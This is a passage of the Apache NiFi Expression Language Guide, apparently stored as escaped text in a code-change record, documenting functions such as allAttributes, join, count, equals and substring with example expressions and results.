[.description]#Checks to see if any of the given attributes, match the given condition. This function has no subject and takes one or more\n\targuments that are the names of attributes to which the remainder of the Expression is to be applied. If all of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*: \n\n\t- [.argName]#_Attribute Names_# : [.argDesc]#One or more attribute names to evaluate#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.allAttributes Example\n|=============================================================================\n| Expression | Value\n| `${allAttributes(\"abc\", \"xyz\"):contains(\"world\")}` | `true`\n| `${allAttributes(\"abc\", \"filename\",\"xyz\"):toUpper():contains(\"e\")}` | `false`\n|=============================================================================\n\n\n\n\n\n[.function]\n=== anyMatchingAttribute\n\n*Description*: [.description]# Checks to see if any of the given attributes, match the given condition. This function has no subject and takes one or more\n\targuments that are Regular Expressions to match against attribute names. Any attribute whose name matches one of the supplied\n\tRegular Expressions will be evaluated against the rest of the Expression. If any of the attributes specified,\n\twhen evaluated against the rest of the Expression, returns a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.anyMatchingAttribute Example\n|==============================================================\n| Expression | Value\n| `${anyMatchingAttribute(\"[ax].*\"):contains('bye')}` | `true`\n| `${anyMatchingAttribute(\".*\"):isNull()}` | `false`\n|==============================================================\n\n\n\n\n\n[.function]\n=== allMatchingAttributes\n\n*Description*: [.description]# Checks to see if any of the given attributes, match the given condition. This function has no subject and takes one or more\n\targuments that are Regular Expressions to match against attribute names. Any attribute whose name matches one of the supplied\n\tRegular Expressions will be evaluated against the rest of the Expression. If all of the attributes specified,\n\twhen evaluated against the rest of the Expression, return a value of `true`, then this function will return `true`. Otherwise, this function\n\twill return `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n\t- [.argName]#_Regex_# : [.argDesc]#One or more Regular Expressions (in the Java Pattern syntax) to evaluate against attribute names#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.anyMatchingAttributes Examples\n|==============================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):contains(\"world\")}` | `true`\n| `${allMatchingAttributes(\".*\"):isNull()}` | `false`\n| `${allMatchingAttributes(\"f.*\"):count()}` | `1`\n|==============================================================\n\n\n\n\n\n[.function]\n=== anyDelineatedValue\n\n*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against\n\tthe rest of the Expression. If the Expression, when evaluated against any of the individual values, returns `true`, this\n\tfunction returns `true`. Otherwise, the function returns `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. This is generally an embedded Expression, \n\t\tthough it does not have to be.#\n\t- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _delineatedValue_ argument.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"number_list\" attribute contains the value \"1,2,3,4,5\", and the \"word_list\" attribute contains the value \"the,and,or,not\", \n\tconsider the following examples:\n\n.anyDelineatedValue Examples\n|===============================================================================\n| Expression | Value\n| `${anyDelineatedValue(\"${number_list}\", \",\"):contains(\"5\")}` | `true`\n| `${anyDelineatedValue(\"this that and\", \",\"):equals(\"${word_list}\")}` | `false`\n|===============================================================================\n\n\n\n[.function]\n=== allDelineatedValues\n\n*Description*: [.description]#Splits a String apart according to a delimiter that is provided, and then evaluates each of the values against\n\tthe rest of the Expression. If the Expression, when evaluated against all of the individual values, returns `true` in each\n\tcase, then this function returns `true`. Otherwise, the function returns `false`.#\n\n*Subject Type*: [.subjectless]#No Subject#\n\n*Arguments*:\n\n\t- [.argName]#_Delineated Value_# : [.argDesc]#The value that is delineated. This is generally \n\t\tan embedded Expression, though it does not have to be.#\n\n\t- [.argName]#_Delimiter_# : [.argDesc]#The value to use to split apart the _delineatedValue_ argument.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: Given that the \"number_list\" attribute contains the value \"1,2,3,4,5\", and the \"word_list\" attribute contains the value \"those,known,or,not\", \n\tconsider the following examples:\n\n.allDelineatedValues Examples\n|===============================================================================\n| Expression | Value\n| `${allDelineatedValues(\"${word_list}\", \",\"):contains(\"o\")}` | `true`\n| `${allDelineatedValues(\"${number_list}\", \",\"):count()}` | `4`\n| `${allDelineatedValues(\"${number_list}\", \",\"):matches(\"[0-9]+\")}` | `true`\n| `${allDelineatedValues(\"${word_list}\", \",\"):matches('e')}` | `false`\n|===============================================================================\n\n\n\n\n[.function]\n=== join\n\n*Description*: [.description]#Aggregate function that concatenates multiple values with the specified delimiter. This function \n\tmay be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`\n\tfunctions.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Delimiter_# : [.argDesc]#The String delimiter to use when joining values#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"filename\" contains \"file.txt\" consider the following examples:\n\n.join Examples\n|=======================================================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):substringBefore(\" \"):join(\"-\")}` | `hello-good`\n| `${allAttributes(\"abc\", \"xyz\"):join(\" now\")}` | `hello world nowgood bye world now`\n|=======================================================================================\n\n\n\n\n\n\n[.function]\n=== count\n\n*Description*: [.description]#Aggregate function that counts the number of non-null, non-false values returned by the \n\t`allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`. This function \n\tmay be used only in conjunction with the `allAttributes`, `allMatchingAttributes`, and `allDelineatedValues`\n\tfunctions.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Number#\n\n*Examples*: Given that the \"abc\" attribute contains the value \"hello world\", \"xyz\" contains \"good bye world\", \n\tand \"number_list\" contains \"1,2,3,4,5\" consider the following examples:\n\n.count Examples\n|===========================================================================\n| Expression | Value\n| `${allMatchingAttributes(\"[ax].*\"):substringBefore(\" \"):count()}` | `2`\n| `${allAttributes(\"abc\", \"xyz\"):contains(\"world\"):count()}` | `1`\n| `${allDelineatedValues(${number_list}, \",\"):count()}` | `5`\n| `${allAttributes(\"abc\", \"non-existent-attr\", \"xyz\"):count()}` | `2`\n| `${allMatchingAttributes(\".*\"):length():gt(10):count()}` | `2`\n|===========================================================================\n\n","old_contents":"\/\/\n\/\/ Licensed to the Apache Software Foundation (ASF) under one or more\n\/\/ contributor license agreements. See the NOTICE file distributed with\n\/\/ this work for additional information regarding copyright ownership.\n\/\/ The ASF licenses this file to You under the Apache License, Version 2.0\n\/\/ (the \"License\"); you may not use this file except in compliance with\n\/\/ the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\nApache NiFi Expression Language Guide\n=====================================\nApache NiFi Team <dev@nifi.incubator.apache.org>\n:homepage: http:\/\/nifi.incubator.apache.org\n\n[[overview]]\nOverview\n--------\nAll data in Apache NiFi is represented by an abstraction called a FlowFile.\nA FlowFile is comprised of two major pieces: content and attributes.\nThe content portion of the FlowFile represents the data on which to operate.\nFor instance, if a file is picked up from a local file system using the\nGetFile Processor, the contents of the file will become the contents of the \nFlowFile.\n\nThe attributes portion of the FlowFile represents information about the data\nitself, or metadata. Attributes are key-value pairs that represent what is\nknown about the data as well as information that is useful for routing and\nprocessing the data appropriately.\nKeeping with the example of a file that is picked up from\na local file system, the FlowFile would have an attribute called `filename` that\nreflected the name of the file on the file system. Additionally, the FlowFile will\nhave a `path` attribute that reflects the directory on the file system that this\nfile lived in. The FlowFile will also have an attribute named `uuid`, which is a\nunique identifier for this FlowFile.\n\nHowever, placing these attributes on a FlowFile do not provide much benefit\nif the user is unable to make use of them. The NiFi Expression Language provides\nthe ability to reference these attributes, compare them to other values,\nand manipulate their values.\n\n\n[[structure]]\nStructure of a NiFi Expression\n------------------------------\n\nThe NiFi Expression Language always begins with the start delimiter `${` and ends\nwith the end delimiter `}`. Between the start and end delimiters is the text of the\nExpression itself. In its most basic form, the Expression can consist of just an\nattribute name. For example, `${filename}` will return the value of the ``filename''\nattribute.\n\nIn a slightly more complex example, we can instead return a manipulation of this value.\nWe can, for example, return an all upper-case version of the filename by calling the\n`toUpper` function: `${filename:toUpper()}`. In this case, we reference the ``filename''\nattribute and then manipulate this value by using the `toUpper` function. A function call\nconsists of 5 elements. First, there is a function call delimiter `:`. Second is the name\nof the function - in this case, ``toUpper''. Next is an open parenthesis (`(`), followed\nby the function arguments. The arguments necessary are dependent upon which function\nis being called. In this example, we are using the `toUpper` function, which does not\nhave any arguments, so this element is omitted. Finally, the closing parenthesis (`)`)\nindicates the end of the function call. There are many different functions that are supported\nby the Expression Language to achieve many different goals. Some functions provide String (text)\nmanipulation, such as the `toUpper` function. Others, such as the `equals` and `matches` functions,\nprovide comparison functionality. Functions also exist for manipulating dates and times and\nfor performing mathematical operations. Each of these functions is described below, in the\n<<functions> section, with an explanation of what the function does, the arguments that it \nrequires, and the type of information that it returns.\n\nWhen we perform a function call on an attribute, as above, we refer to the attribute as the\n_subject_ of the function, as the attribute is the entity on which the function is operating.\nWe can then chain together multiple function calls, where the return value of the first function\nbecomes the subject of the second function and its return value becomes the subject of the third\nfunction and so on. Continuing with our example, we can chain together multiple functions by using\nthe expression `${filename:toUpper():equals('HELLO.TXT')}`. There is no limit to the number of\nfunctions that can be chained together.\n\nAny FlowFile attribute can be referenced using the Expression Language. However, if the attribute\nname contains a ``special character,'' the attribute name must be escaped by quoting it. The following\ncharacters are each considered ``special characters'':\n\n- $ (dollar sign)\n- | (pipe)\n- { (open brace)\n- } (close brace)\n- ( (open parenthesis)\n- ) (close parenthesis)\n- [ (open bracket)\n- ] (close bracket)\n- , (comma)\n- : (colon)\n- ; (semicolon)\n- \/ (forward slash)\n- * (asterisk)\n- ' (single quote)\n- (space)\n- \\t (tab)\n- \\r (carriage return)\n- \\n (new-line)\n\nAdditionally, a number is considered a ``special character'' if it is the first character of the attribute name.\nIf any of these special characters is present in an attribute is quoted by using either single or double quotes.\nThe Expression Language allows single quotes and double quotes to be used interchangeably. For example, the following\ncan be used to escape an attribute named ``my attribute'': `${\"my attribute\"}` or `${'my attribute'}`.\n\nIn this example, the value to be returned is the value of the \"my attribute\" value, if it exists. If that attribute\ndoes not exist, the Expression Language will then look for a System Environment Variable named \"my attribute.\" If\nunable to find this, it will look for a JVM System Property named \"my attribute.\" Finally, if none of these exists,\nthe Expression Language will return a `null` value.\n\nThere also exist some functions that expect to have no subject. These functions are invoked simply\nby calling the function at the beginning of the Expression, such as `${hostname()}`. These functions\ncan then be changed together, as well. For example, `${hostname():toUpper()}`. Attempting to \nevaluate the function with subject will result in an error. In the <<functions>>\nsection below, these functions will clearly indicate in their descriptions that they do not\nrequire a subject.\n\nOften times, we will need to compare the values of two different attributes to each other. \nWe are able to accomplish this by using embedded Expressions. We can, for example, check if\nthe ``filename'' attribute is the same as the ``uuid'' attribute: `${filename:equals( ${uuid} )}`.\nNotice here, also, that we have a space between the opening parenthesis for the `equals` method and\nthe embedded Expression. This is not necessary and does not affect how the Expression is evaluated\nin any way. Rather, it is intended to make the Expression easier to read. White space is ignored by\nthe Expression Language between delimiters. Therefore, we can use the Expression\n`${ filename : equals(${ uuid}) }` or `${filename:equals(${uuid})}` and both Expressions\nmean the same thing. We cannot, however, use `${file name:equals(${uuid})}`, because this results\nin `file` and `name` being interpreted as different tokens, rather than a single token, `filename`.\n\n\n\n[[usage]]\n== Expression Language in the Application\n\nThe Expression Language is used heavily throughout the NiFi application for configuring Processor\nproperties. Not all Processor properties support the Expression Language, however. Whether or not\na Property supports the Expression Language is determined by the developer of the Processor when\nthe Processor is written. However, the application strives to clearly illustrate for each Property\nwhether or not the Expression Language is supported.\n\nIn the application, when configuring a Processor property, the User Interface provides an Information\nicon (\nimage:iconInfo.png[\"Info\"]\n) next to the name of the Property. Hovering over this icon with the mouse will provide a tooltip that\nprovides helpful information about the Property. This information includes a description of the Property,\nthe default value (if any), historically configured values (if any), and whether or not this Property\nsupports the expression language.\n\n\n[[editor]]\n=== Expression Language Editor\n\nWhen configuring the value of a Processor property, the NiFi User Interface provides help with the\nExpression Language using the Expression Language editor. Once an Expression is begin by typing `${`,\nthe editor begins to highlight parentheses and braces so that the user is easily able to tell which\nopening parenthesis or brace matches which closing parenthesis or brace.\n\nThe editor also supplies context-sensitive help by providing a list of all functions that can be used\nat the current cursor position. To activate this feature, press Ctrl+Space on the keyboard. The user\nis also able to type part of a function name and then press Ctrl+Space to see all functions that can\nbe used that start with the same prefix. For example, if we type into the editor `${filename:to`\nand then press Ctrl+Space, we are provided a pop-up that lists six different functions: `toDate`,\n`toLower`, `toNumber`, `toRadix`, `toString`, and `toUpper`. We can then continue typing to narrow\nwhich functions are shown, or we can select one of the functions from the list by double-clicking\nit with the mouse or using the arrow keys to highlight the desired function and pressing Enter.\n\n\n\n[[functions]]\n== Functions\n\nFunctions provide a convenient way to manipulate and compare values of attributes. The Expression Language\nprovides many different functions to meet the needs of a automated dataflow. Each function takes \nzero or more arguments and returns a single value. These functions can then be chained together to create\npowerful Expressions to evaluate conditions and manipulate values. See <<structure>> for more information \non how to call and chain functions together.\n\n[[types]]\n=== Data Types\n\nEach argument to a function and each value returned from a function has a specific data type. The Expression\nLanguage supports four different data types:\n\n- *String*: A String is a sequence of characters that can consist of numbers, letters, white space, and\n\tspecial characters.\n- *Number*: A Number is an integer comprised of one or more digits (`0` through `9`). The Expression Language \n\tdoes not provide support for fractional numbers. Dates and times are represented in the\n\tExpression Language as Numbers, representing the number of milliseconds since midnight GMT on January 1, 1970.\n- *Boolean*: A Boolean is one of either `true` or `false`.\n\nAll attributes are considered to be of type String.\n\nThe Expression Language is generally able to automatically coerce a value of one data type to the appropriate\ndata type for a function. However, functions do exist to manually coerce a value into a specific data type. \nSee the <<type_cast>> section for more information. \n\n\n\n\n\n\n[[boolean]]\n== Boolean Logic\n\nOne of the most powerful features of the Expression Language is the ability to compare an attribute value against\nsome other value. This is used often, for example, to configure how a Processor should route data. The following\nfunctions are used for performing boolean logic, such as comparing two values. \nEach of these functions returns a value of type Boolean.\n\n\n[.function]\n=== isNull\n*Description*: [.description]#The `isNull` function returns `true` if the subject is null, `false` otherwise. This is typically used to determine\nif an attribute exists.#\n\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*:\t`${filename:isNull()}` returns `true` if the \"filename\" attribute does not exist. \n\tIt returns `true` if the attribute exists.\n\n\n\n[.function]\n=== notNull\n*Description*: [.description]#The `notNull` function returns the opposite value of the `isNull` function. That is, it will return `true` if the\nsubject exists and `false` otherwise.#\n\t\n*Subject Type*: [.subject]#Any#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:notNull()}` returns `true` if the \"filename\" attribute exists. It returns \"false\" if the attribute\n\tdoes not exist.\n\n\n\n[.function]\n=== equals\n\n[.description]\n*Description*: [.description]#The `equals` function is very widely used and determines if its subject is equal to another String value.\n\tNote that the `equals` function performs a direct comparison of two String values. Take care not to confuse this\n\tfunction with the <<matches>> function, which evaluates its subject against a Regular Expression.#\n\n[.subject]\t\n*Subject Type*: [.subject]#Any#\n\n[.arguments]\n*Arguments*:\n\t\n\t- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to. Must be same type as the Subject.#\n\n[.returnType]\n*Return Type*: [.returnType]#Boolean#\n\n[.examples]\n*Examples*:\nWe can check if the filename of a FlowFile is \"hello.txt\" by using the expression `${filename:equals('hello.txt')}`,\nor we could check if the value of the attribute `hello` is equal to the value of the `filename` attribute:\n`${hello:equals( ${filename} )}`.\n\n\n\n[.function]\n=== equalsIgnoreCase\n*Description*: [.description]#Similar to the `equals` function, the `equalsIgnoreCase` function compares its subject against a String value but returns\n`true` if the two values differ only by case (upper case vs. lower case).#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${filename:equalsIgnoreCase('hello.txt')}` will evaluate to `true` if filename is equal to \"hello.txt\" \n\tor \"HELLO.TXT\" or \"HeLLo.TxT\".\n\n\n\n\n[.function]\n=== gt\n*Description*: [.description]#The `gt` function is used for numeric comparison and returns `true` if the subject is Greater Than \n\tits argument. If either the subject or the argument cannot be coerced into a Number, \n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:gt( 1024 )}` will return `true` if the size of the FlowFile's content is more than 1 kilobyte\n\t(1024 bytes). Otherwise, it will return `false`.\n\n\n\n\n[.function]\n=== ge\n*Description*: [.description]#The `ge` function is used for numeric comparison and returns `true` if the subject is Greater Than \n\tOr Equal To its argument. If either the subject or the argument cannot be coerced into a Number, \n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:ge( 1024 )}` will return `true` if the size of the FlowFile's content is at least (\n\tis greater than or equal to) 1 kilobyte (1024 bytes). Otherwise, it will return `false`.\n\n\n\n[.function]\n=== lt\n*Description*: [.description]#The `lt` function is used for numeric comparison and returns `true` if the subject is Less Than \n\tits argument. If either the subject or the argument cannot be coerced into a Number, \n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:lt( 1048576 )}` will return `true` if the size of the FlowFile's content is less than\n\t1 megabyte (1048576 bytes). Otherwise, it will return `false`.\n\n\n\n\n[.function]\n=== le\n*Description*: [.description]#The `le` function is used for numeric comparison and returns `true` if the subject is Less Than \n\tOr Equal To its argument. If either the subject or the argument cannot be coerced into a Number, \n\tthis function returns `false`.#\n\n*Subject Type*: [.subject]#Number#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: `${fileSize:le( 1048576 )}` will return `true` if the size of the FlowFile's content is at most\n\t(less than or equal to) 1 megabyte (1048576 bytes). Otherwise, it will return `false`.\n\n\n\n\n\n\n[.function]\n=== and\n*Description*: [.description]#The `and` function takes as a single argument a Boolean value and returns `true` if both the Subject\n\tand the argument are `true`. If either the subject or the argument is `false` or cannot be coerced into a Boolean,\n\tthe function returns `false`. Typically, this is used with an embedded Expression as the argument.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'and' Expression#\n\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: We can check if the filename is both all lower-case and has at least 5 characters by using the Expression\n-----------------------------------------------\n${filename:toLower():equals( ${filename} ):and(\n\t${filename:length():ge(5)}\n)}\n-----------------------------------------------\n\n\n\n\n\n[.function]\n=== or\n\n*Description*: [.description]#The `or` function takes as a single argument a Boolean value and returns `true` if either the Subject\n\tor the argument is `true`. If both the subject and the argument are `false`, the function returns `false`. If\n\teither the Subject or the argument cannot be coerced into a Boolean value, this function will return `false`.#\n\n*Subject Type*: [.subject]#Boolean#\n\n*Arguments*:\n\n\t- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'and' Expression#\n\n*Return Type*: [.returnType]#Boolean#\n\n*Examples*: The following example will return `true` if either the filename has exactly 5 characters or if\n\tthe filename is all lower-case.\n----------------------------------------------\n${filename:toLower():equals( ${filename} ):or(\n\t${filename:length():equals(5)}\n)}\n----------------------------------------------\n\n\n\n[.function]\n=== not\n\n[.description]\n*Description*: [.description]#The `not` function returns the negation of the Boolean value of the subject.#\n\n[.subject]\n*Subject Type*: [.subject]#Boolean#\n\n[.arguments]\n*Arguments*: No arguments\n\n[.returnType]\n*Return Type*: [.returnType]#Boolean#\n\n[.examples]\n*Examples*: We can invert the value of another function by using the `not` function, as \n\t`${filename:equals('hello.txt'):not()}`. This will return `true` if the filename is NOT equal to\n\t\"hello.txt\" and will return `false` if the filename is \"hello.txt.\"\n\n\n\n\n\n\n\n[[strings]]\n== String Manipulation\n\nEach of the following functions manipulates a String in some way.\n\n\n\n\n[.function]\n=== toUpper\n\n*Description*: [.description]#This function converts the Subject into an all upper-case String. Said another way, it\n\treplaces any lowercase letter with the uppercase equivalent.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute is \"abc123.txt\", then the Expression `${filename:toUpper()}` \n\twill return \"ABC123.TXT\"\n\n\n\n\n\n[.function]\n=== toLower\n\n*Description*: [.description]#This function converts the Subject into an all lower-case String. Said another way,\n\tit replaces any uppercase letter with the lowercase equivalent.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute is \"ABC123.TXT\", then the Expression `${filename:toLower()}`\n\twill return \"abc123.txt\"\n\n\n\n\n\n[.function]\n=== trim\n\n*Description*: [.description]#The `trim` function will remove any leading or trailing white space from its subject.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the attribute `attr` has the value \" 1 2 3 \", then the Expression `${attr:trim()}` will\n\treturn the value \"1 2 3\".\n\n\n\n\n\n[.function]\n=== urlEncode\n\n*Description*: [.description]#Returns a URL-friendly version of the Subject. This is useful, for instance, when using an\n\tattribute value to indicate the URL of a website.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: We can URL-Encode an attribute named \"url\" by using the Expression `${url:urlEncode()}`. If\n\tthe value of the \"url\" attribute is \"https:\/\/nifi.incubator.apache.org\/some value with spaces\", this\n\tExpression will then return \"https:\/\/nifi.incubator.apache.org\/some%20value%20with%20spaces\".\n\n\n\n\n[.function]\n=== urlDecode\n\n*Description*: [.description]#Converts a URL-friendly version of the Subject into a human-readable form.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: No arguments\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If we have a URL-Encoded attribute named \"url\" with the value \n\t\"https:\/\/nifi.incubator.apache.org\/some%20value%20with%20spaces\", then the Expression\n\t`${url:urlDecode()}` will return \"https:\/\/nifi.incubator.apache.org\/some value with spaces\".\n\n\n\n\n\n[.function]\n=== substring\n\n*Description*: \n[.description]#Returns a portion of the Subject, given a _starting index_ and an optional _ending index_.\n\tIf the _ending index_ is not supplied, it will return the portion of the Subject starting at the given\n\t'start index' and ending at the end of the Subject value.#\n\n[.description]#The _starting index_ and _ending index_ are zero-based. That is, the first character is referenced by using\n\tthe value `0`, not `1`.#\n\n[.description]#If either the _starting index_ is or the _ending index_ is not a number, this function call will result\n\tin an error.#\n\n[.description]#If the _starting index_ is larger than the _ending index_, this function call will result in an error.#\n\n[.description]#If the _starting index_ or the _ending index_ is greater than the length of the Subject or has a value\n\tless than 0, this function call will result in an error.#\n\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*: \n\n\t- [.argName]#_starting index_# : [.argDesc]#The 0-based index of the first character to capture (inclusive)#\n\t- [.argName]#_ending index_# : [.argDesc]#The 0-based index of the last character to capture (exclusive)#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: \n\nIf we have an attribute named \"filename\" with the value \"a brand new filename.txt\",\nthen the following Expressions will result in the following values:\n\n.Substring Examples\n|================================================================\n| Expression | Value\n| `${filename:substring(0,1)}` | `a`\n| `${filename:substring(2)}` | `brand new filename.txt`\n| `${filename:substring(12)}` | `filename.txt`\n| `${filename:substring( ${filename:length():minus(2)} )}` | `xt`\n|================================================================\n\n\n\n\n[.function]\n=== substringBefore\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject\n\tand ending with the character immediately before the first occurrence of the argument. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\t\n.SubstringBefore Examples\n|======================================================================\n| Expression | Value\n| `${filename:substringBefore('.')}` | `a brand new filename`\n| `${filename:substringBefore(' ')}` | `a`\n| `${filename:substringBefore(' n')}` | `a brand`\n| `${filename:sbustringBefore('missing')}` | `a brand new filename.txt`\n|======================================================================\n\n\n\n\n\n[.function]\n=== substringBeforeLast\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject\n\tand ending with the character immediately before the last occurrence of the argument. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String3\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\t\n.SubstringBeforeLast Examples\n|==========================================================================\n| Expression | Value\n| `${filename:substringBeforeLast('.')}` | `a brand new filename`\n| `${filename:substringBeforeLast(' ')}` | `a brand new`\n| `${filename:substringBeforeLast(' n')}` | `a brand`\n| `${filename:substringBeforeLast('missing')}` | `a brand new filename.txt`\n|==========================================================================\n\n\n\n\n\n\n[.function]\n=== substringAfter\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after\n\tthe first occurrence of the argument and extending to the end of the Subject. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\t\n.SubstringAfter Examples\n|======================================================================\n| Expression | Value\n| `${filename:substringAfter('.')}` | `txt`\n| `${filename:substringAfter(' ')}` | `brand new filename.txt`\n| `${filename:substringAfter(' n')}` | `ew filename.txt`\n| `${filename:substringAfter('missing')}` | `a brand new filename.txt`\n|======================================================================\n\n\n\n\n\n[.function]\n=== substringAfterLast\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after\n\tthe last occurrence of the argument and extending to the end of the Subject. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\t\n.SubstringAfterLast Examples\n|=========================================================================\n| Expression | Value\n| `${filename:substringAfterLast('.')}` | `txt`\n| `${filename:substringAfterLast(' ')}` | `filename.txt`\n| `${filename:substringAfterLast(' n')}` | `ew filename.txt`\n| `${filename:substringAfterLast('missing')}` | `a brand new filename.txt`\n|=========================================================================\n\n\n\n\n\n\n\n[.function]\n=== append\n\n*Description*: [.description]#The `append` function returns the result of appending the argument to the value of\n\tthe Subject. If the Subject is null, returns the argument itself.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to append to the end of the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\", then the Expression\n\t`${filename:append('.gz')}` will return \"a brand new filename.txt.gz\".\n\n\n\n\n\n[.function]\n=== prepend\n\n*Description*: [.description]#The `prepend` function returns the result of prepending the argument to the value of\n\tthe Subject. If the subject is null, returns the argument itself.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to prepend to the beginning of the Subject#\n\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"filename.txt\", then the Expression\n\t`${filename:prepend('a brand new ')}` will return \"a brand new filename.txt\".\n\n\n\n\n\n[.function]\n=== replace\n\n*Description*: [.description]#Replaces occurrences of one String within the Subject with another String.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_Search 